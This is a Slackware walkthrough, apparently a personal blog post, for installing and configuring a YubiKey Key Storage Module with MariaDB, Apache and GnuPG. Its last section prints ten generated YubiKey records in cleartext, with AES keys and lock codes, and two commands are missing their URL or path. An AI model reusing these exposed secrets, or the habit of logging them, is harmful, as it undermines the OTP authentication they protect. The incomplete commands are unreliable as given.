slackware-14.2 yubikey Key-Storage-Module

  ozzie / 21/12/2017

Slackware Linux
Apache, PHP, MySQL, OpenPGP

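Download source (the repository URL is missing from the `git clone` line below; the clone target is the `yubikey-ksm` repository)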

root@badak1:~# git clone
Cloning into 'yubikey-ksm'...
remote: Counting objects: 681, done.
remote: Total 681 (delta 0), reused 0 (delta 0), pack-reused 681
Receiving objects: 100% (681/681), 133.22 KiB | 154.00 KiB/s, done.
Resolving deltas: 100% (398/398), done.
Checking connectivity... done.

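Edit Makefile: change the default `wwwgroup` / `wwwprefix` values (first pair below) to the Apache group and document root used on Slackware (second pair)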

root@badak1:~# cd yubikey-ksm/
root@badak1:~/yubikey-ksm# vi Makefile


wwwgroup = www-data
wwwprefix = /var/www/wsapi


wwwgroup = apache
wwwprefix = /var/www/htdocs/wsapi

Build & Install

root@badak1:~/yubikey-ksm# make install
install -D --mode 640 .htaccess /usr/share/yubikey-ksm/.htaccess
install -D --mode 640 ykksm-decrypt.php /usr/share/yubikey-ksm/ykksm-decrypt.php
install -D --mode 640 ykksm-utils.php /usr/share/yubikey-ksm/ykksm-utils.php
install -D ykksm-gen-keys /usr/bin/ykksm-gen-keys
install -D ykksm-import /usr/bin/ykksm-import
install -D ykksm-export /usr/bin/ykksm-export
install -D ykksm-checksum /usr/bin/ykksm-checksum
install -D --backup --mode 640 --group apache ykksm-config.php /etc/yubico/ksm/ykksm-config.php
install -D ykksm-gen-keys.1 /usr/share/man/man1/ykksm-gen-keys.1
install -D ykksm-import.1 /usr/share/man/man1/ykksm-import.1
install -D ykksm-export.1 /usr/share/man/man1/ykksm-export.1
install -D ykksm-checksum.1 /usr/share/man/man1/ykksm-checksum.1
install -D ykksm-db.sql /usr/share/doc/yubikey-ksm/ykksm-db.sql
install -D Makefile /usr/share/doc/yubikey-ksm/
install -D doc/Decryption_Protocol.adoc doc/Design_Goals.adoc doc/Generate_Keys.adoc 
doc/Generate_KSM_Key.adoc doc/Import_Keys_To_KSM.adoc doc/Installation.adoc 
doc/Key_Provisioning_Format.adoc doc/Server_Hardening.adoc doc/Sync_Monitor.adoc 

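Configure & Import MySQL

The session below uses the MySQL root account to create the database and load the schema. For the KSM itself, use a separate database account with only the privileges it needs rather than root.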

root@badak1:~# mysql_install_db --user=mysql
root@badak1:~# chmod 755 /etc/rc.d/rc.mysqld
root@badak1:~# /etc/rc.d/rc.mysqld  start
root@badak1:~# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 10.0.26-MariaDB MariaDB Server
Copyright (c) 2000, 2016, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> create database ykksm;
Query OK, 1 row affected (0.00 sec)
MariaDB [(none)]> \q
root@badak1:~# mysql -u root -p ykksm < /usr/share/doc/yubikey-ksm/ykksm-db.sql

Edit php.ini

include_path = "/etc/yubico/ksm:/usr/share/yubikey-ksm"

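Install OTP (the `symlink` target links `.htaccess` and the decrypt script into the web root; the Makefile file name after the directory in the `-f` argument is missing below, so point `-f` at the copy that `make install` placed in /usr/share/doc/yubikey-ksm/)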

root@badak1:~/yubikey-ksm# make -f /usr/share/doc/yubikey-ksm/ symlink
install -d /var/www/htdocs/wsapi
ln -sf /usr/share/yubikey-ksm/.htaccess /var/www/htdocs/wsapi/.htaccess
ln -sf /usr/share/yubikey-ksm/ykksm-decrypt.php /var/www/htdocs/wsapi/decrypt.php

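Generate KSM Key

This OpenPGP key encrypts and signs the generated key file in the next step, and its secret key is needed to decrypt that file at import. Protect its passphrase and /root/.gnupg accordingly.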

root@badak1:~# gpg --gen-key
gpg (GnuPG) 1.4.20; Copyright (C) 2015 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
         0 = key does not expire
      <n>  = key expires in n days
      <n>w = key expires in n weeks
      <n>m = key expires in n months
      <n>y = key expires in n years
Key is valid for? (0)
Key does not expire at all
Is this correct? (y/N) Y
You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
    "Heinrich Heine (Der Dichter) <>"
Real name: ozzienich
Email address:
Comment: --
You selected this USER-ID:
    "ozzienich (--) <>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
You need a Passphrase to protect your secret key.
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 654FBFAC marked as ultimately trusted
public and secret key created and signed.
gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u
pub   2048R/654FBFAC 2017-12-21
      Key fingerprint = 573F 524E 5A53 C893 87E4  AA47 5D00 059F 654F BFAC
uid                  ozzienich (--) <>
sub   2048R/EA96F715 2017-12-21
root@badak1:~# gpg --list-key
pub   2048R/654FBFAC 2017-12-21
uid                  ozzienich (--) <>
sub   2048R/EA96F715 2017-12-21

Generate Keys

root@badak1:~# ykksm-gen-keys --urandom 1 10 | gpg -a --encrypt -r 654FBFAC  -s > keys.txt
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID 654FBFAC, created 2017-12-21
root@badak1:~# gpg < keys.txt
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID EA96F715, created 2017-12-21 (main key ID 654FBFAC)
gpg: encrypted with 2048-bit RSA key, ID EA96F715, created 2017-12-21
      "ozzienich (--) <>"
# ykksm 1
# serialnr,identity,internaluid,aeskey,lockpw,created,accessed[,progflags]
# the end
gpg: Signature made Thu 21 Dec 2017 03:38:02 PM WIB using RSA key ID 654FBFAC
gpg: Good signature from "ozzienich (--) <>"

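Import Keys To Yubikey KSM

Note: with `--verbose` the import prints every record in cleartext, including the AES key and lock code, so do not capture this output in logs or paste it anywhere on a production system. `--db-passwd` also puts the database password on the command line, where it is visible in shell history and the process list. The values shown below are from the author's own run.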

root@badak1:~# ykksm-import --verbose --database 'DBI:mysql:dbname=ykksm;host=localhost' --db-user XXXX --db-passwd XXXX < ~/keys.txt
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID EA96F715, created 2017-12-21 (main key ID 654FBFAC)
Verification output:
[GNUPG:] ENC_TO F13DAD25EA96F715 1 0
[GNUPG:] USERID_HINT F13DAD25EA96F715 ozzienich (--) <>
gpg: encrypted with 2048-bit RSA key, ID EA96F715, created 2017-12-21
      "ozzienich (--) <>"
[GNUPG:] PLAINTEXT 62 1513845482
gpg: Signature made Thu 21 Dec 2017 03:38:02 PM WIB using RSA key ID 654FBFAC
[GNUPG:] SIG_ID tYngCEEO/FWR5YCuKihwjTajxo0 2017-12-21 1513845482
[GNUPG:] GOODSIG 5D00059F654FBFAC ozzienich (--) <>
gpg: Good signature from "ozzienich (--) <>"
[GNUPG:] VALIDSIG 573F524E5A53C89387E4AA475D00059F654FBFAC 2017-12-21 1513845482 0 4 0 1 8 00 573F524E5A53C89387E4AA475D00059F654FBFAC
encrypted to: F13DAD25EA96F715
signed by: 654FBFAC
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID EA96F715, created 2017-12-21 (main key ID 654FBFAC)
line: 1,cccccccccccb,8f571fa25058,fb97d03b7126d1cde2437a9dedac3f28,581a6c4ed37e,2017-12-21T15:38:02,
        serialnr 1 publicname cccccccccccb internalname 8f571fa25058 aeskey fb97d03b7126d1cde2437a9dedac3f28 
lockcode 581a6c4ed37e created 2017-12-21T15:38:02 accessed  eol
line: 2,cccccccccccd,5b77a49decb3,0f6d2512cd851fecf62ac563ed6a8a28,2494828d32a8,2017-12-21T15:38:02,
        serialnr 2 publicname cccccccccccd internalname 5b77a49decb3 aeskey 0f6d2512cd851fecf62ac563ed6a8a28 
lockcode 2494828d32a8 created 2017-12-21T15:38:02 accessed  eol
line: 3,ccccccccccce,5fb827ac0f57,09857027dd82a0ac835701cd54fe4b7d,c18b216cfa9c,2017-12-21T15:38:02,
        serialnr 3 publicname ccccccccccce internalname 5fb827ac0f57 aeskey 09857027dd82a0ac835701cd54fe4b7d 
lockcode c18b216cfa9c created 2017-12-21T15:38:02 accessed  eol
line: 4,cccccccccccf,33fb7d3c6875,fdf7bdc7af6f84fece2d8d3e36e2da37,dc7191563906,2017-12-21T15:38:02,
        serialnr 4 publicname cccccccccccf internalname 33fb7d3c6875 aeskey fdf7bdc7af6f84fece2d8d3e36e2da37 
lockcode dc7191563906 created 2017-12-21T15:38:02 accessed  eol
line: 5,cccccccccccg,df3e9f911fbe,455acd1d2ce2297964dd003af33651f4,f0ef56b46c92,2017-12-21T15:38:02,
        serialnr 5 publicname cccccccccccg internalname df3e9f911fbe aeskey 455acd1d2ce2297964dd003af33651f4 
lockcode f0ef56b46c92 created 2017-12-21T15:38:02 accessed  eol
line: 6,ccccccccccch,2c525fc6fbd6,6412532c160cb7a66c69d79372d84115,da95b9e2b6ce,2017-12-21T15:38:02,
        serialnr 6 publicname ccccccccccch internalname 2c525fc6fbd6 aeskey 6412532c160cb7a66c69d79372d84115 
lockcode da95b9e2b6ce created 2017-12-21T15:38:02 accessed  eol
line: 7,ccccccccccci,acfab204f600,aea86d571d39224d9eadc7c1a323b5f2,22d8ddbee8e2,2017-12-21T15:38:02,
        serialnr 7 publicname ccccccccccci internalname acfab204f600 aeskey aea86d571d39224d9eadc7c1a323b5f2 
lockcode 22d8ddbee8e2 created 2017-12-21T15:38:02 accessed  eol
line: 8,cccccccccccj,bd602f2c5a0b,1407a47e262a4d5e42d2c9dd0529a95f,f351df3fea41,2017-12-21T15:38:02,
        serialnr 8 publicname cccccccccccj internalname bd602f2c5a0b aeskey 1407a47e262a4d5e42d2c9dd0529a95f 
lockcode f351df3fea41 created 2017-12-21T15:38:02 accessed  eol
line: 9,ccccccccccck,9f674f8d73f2,f27505d5deda0c4dc33764e7bf009afa,537c32f72293,2017-12-21T15:38:02,
        serialnr 9 publicname ccccccccccck internalname 9f674f8d73f2 aeskey f27505d5deda0c4dc33764e7bf009afa 
lockcode 537c32f72293 created 2017-12-21T15:38:02 accessed  eol
line: 10,cccccccccccl,ae986cf8f6d6,84cc170bc1c9e4c9381a6cca46140bac,75aeb77c0c20,2017-12-21T15:38:02,
        serialnr 10 publicname cccccccccccl internalname ae986cf8f6d6 aeskey 84cc170bc1c9e4c9381a6cca46140bac 
lockcode 75aeb77c0c20 created 2017-12-21T15:38:02 accessed  eol
